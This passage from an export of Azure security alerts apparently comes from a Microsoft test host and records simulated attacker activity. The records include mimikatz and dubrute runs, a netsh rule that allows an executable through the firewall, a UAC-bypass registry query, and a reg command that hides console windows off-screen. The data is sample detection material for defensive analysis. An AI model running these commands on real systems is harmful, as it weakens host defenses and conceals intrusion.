""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""sdopfjiowtbkjfnbeioruj.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1564"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\sdopfjiowtbkjfnbeioruj.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:17.0755415Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:17.0755415Z"",
""EndTimeUtc"": ""2019-01-15T05:15:17.0755415Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
90,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:15,2019-01-15 05:15:15,ad5981a5-fdcc-406a-8742-e50bd7f84917,2518547714842732992_ad5981a5-fdcc-406a-8742-e50bd7f84917,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\dubrute.exe' was running on the machine; this process is associated with carrying out brute force attacks. An attacker may have compromised this host as a launchpad for carrying out further attacks.',High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\dubrute.exe"",
""Suspicious Command Line"": "".\\dubrute.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x15c0"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""dubrute.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15c0"",
""CommandLine"": "".\\dubrute.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:15.7267007Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:15.7267007Z"",
""EndTimeUtc"": ""2019-01-15T05:15:15.7267007Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
91,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,e776fca2-4c01-43eb-ab97-b9845af3529c,2518547714838326136_e776fca2-4c01-43eb-ab97-b9845af3529c,Detection,Microsoft,Suspected Kerberos Golden Ticket attack parameters observed,Suspected Kerberos Golden Ticket attack parameters observed,Suspected Kerberos Golden Ticket attack parameters observed,Analysis of host data detected commandline parameters consistent with a Kerberos Golden Ticket attack.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg not /domain:everything that /sid:shines is /krbtgt:golden !"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x16fc"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x16fc"",
""CommandLine"": "".\\reg not /domain:everything that /sid:shines is /krbtgt:golden !"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.1673863Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.1673863Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.1673863Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
92,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:15,2019-01-15 05:15:15,55cd3e12-3a91-4b06-9be6-833df3365142,2518547714844457503_55cd3e12-3a91-4b06-9be6-833df3365142,Detection,Microsoft,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,"Analysis of host data on MSTICALERTSWIN1 detected a command-line with anomalous mix of upper and lower case characters. This kind of pattern, while possibly benign, is also typical of attackers trying to hide from case-sensitive or hash-based rule matching when performing administrative tasks on a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\rundll32.exe"",
""Suspicious Command Line"": "".\\rundll32 /c shell32control_randll.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1550"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1550"",
""CommandLine"": "".\\rundll32 /c shell32control_randll.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:15.5542496Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:15.5542496Z"",
""EndTimeUtc"": ""2019-01-15T05:15:15.5542496Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
93,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,33edaa83-fe35-47de-9486-fc9792c5b65b,2518547714839319574_33edaa83-fe35-47de-9486-fc9792c5b65b,Detection,Microsoft,Detected suspicious new firewall rule,Detected suspicious new firewall rule,Detected suspicious new firewall rule,Analysis of host data detected a new Firewall rule has been added via netsh.exe to allow traffic from an executable in a suspicious location.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\netsh.exe"",
""Suspicious Command Line"": "".\\netsh advfirewall firewall add rule name=rbtgskq action=allow program=c:\\users\\bob\\appdata\\roaming\\rbtgskq\\rbtgskq.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x168c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""netsh.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x168c"",
""CommandLine"": "".\\netsh advfirewall firewall add rule name=rbtgskq action=allow program=c:\\users\\bob\\appdata\\roaming\\rbtgskq\\rbtgskq.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.0680425Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.0680425Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.0680425Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
94,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:15,2019-01-15 05:15:15,8f71e695-ba9b-4c97-9770-63cdeb34b7b4,2518547714844291280_8f71e695-ba9b-4c97-9770-63cdeb34b7b4,Detection,Microsoft,Detected change to a registry key that can be abused to bypass UAC,Detected change to a registry key that can be abused to bypass UAC,Detected change to a registry key that can be abused to bypass UAC,"Analysis of host data on MSTICALERTSWIN1 detected that a registry key that can be abused to bypass UAC (User Account Control) was changed. This kind of configuration, while possibly benign, is also typical of attacker activity when trying to move from unprivileged (standard user) to privileged (for example administrator) access on a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg query add mscfile\\\\\\\\open"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1560"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1560"",
""CommandLine"": "".\\reg query add mscfile\\\\\\\\open"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:15.5708719Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:15.5708719Z"",
""EndTimeUtc"": ""2019-01-15T05:15:15.5708719Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
95,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,e2a60bd1-d7c8-466d-a176-4333d4e0d1d5,2518547714854375707_e2a60bd1-d7c8-466d-a176-4333d4e0d1d5,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,"Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\mimikatz.exe' was running on the machine, often associated with attacker attempts to access credentials.'",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\mimikatz.exe"",
""Suspicious Command Line"": "".\\mimikatz.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1440"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1440"",
""CommandLine"": "".\\mimikatz.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.5624292Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.5624292Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.5624292Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
96,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:14,2019-01-15 05:15:14,9bfd0e4b-ec93-46bb-8eea-f72e8f1262f1,2518547714858429362_9bfd0e4b-ec93-46bb-8eea-f72e8f1262f1,Detection,Microsoft,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,"Analysis of host data on MSTICALERTSWIN1 detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in non-visible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00, corresponding to X-axis=0c00 and the Y-axis=0c00) this places the console app's window in a non-visible section of the user's screen in an area that is hidden from view below the visible start menu/taskbar. Known suspect Hex value includes, but not limited to c000c000",Low,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1758"",
""Hex Value set for WindowPosition"": ""200007c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1758"",
""CommandLine"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:14.1570637Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""Hive"": ""HKEY_CURRENT_USER"",
""Key"": ""console"",
""Type"": ""registry-key""
},
{
""$id"": ""11"",
""Key"": {
""$ref"": ""10""
},
""ValueType"": ""Unknown"",
""Type"": ""registry-value""
},
{
""$id"": ""12"",
""Key"": {
""$ref"": ""10""
},
""Name"": ""windowposition"",
""Value"": ""System.Byte[]"",
""ValueType"": ""DWord"",
""Type"": ""registry-value""
},
{
""$id"": ""13"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:14.1570637Z"",
""EndTimeUtc"": ""2019-01-15T05:15:14.1570637Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
97,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,4bb2ecc3-f4aa-40cd-a3d7-802fc9086e89,2518547714834806864_4bb2ecc3-f4aa-40cd-a3d7-802fc9086e89,Detection,Microsoft,Detected suspicious execution via rundll32.exe,Detected suspicious execution via rundll32.exe,Detected suspicious execution via rundll32.exe,"Analysis of host data on MSTICALERTSWIN1 detected rundll32.exe being used to execute a notepad.exe or reg.exe, consistent with the process injection technique previously seen used by activity group GOLD when installing their first stage implant on a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": ""reg.exe"",
""Parent Process"": ""c:\\diagnostics\\usertmp\\rundll32.exe"",
""Suspicious Process Id"": ""0x17e8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: GOLD\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-GOLD.pdf?sv=2018-03-28&sr=b&sig=WU7iUaOAYWclOTrdJwE5UqYIWfLX6Hy%2BV5nZk%2FfWh4k%3D&spr=https&st=2019-01-15T05:00:23Z&se=2019-04-15T05:15:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x17cc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17e8"",
""CommandLine"": ""reg.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.5193135Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.5193135Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.5193135Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
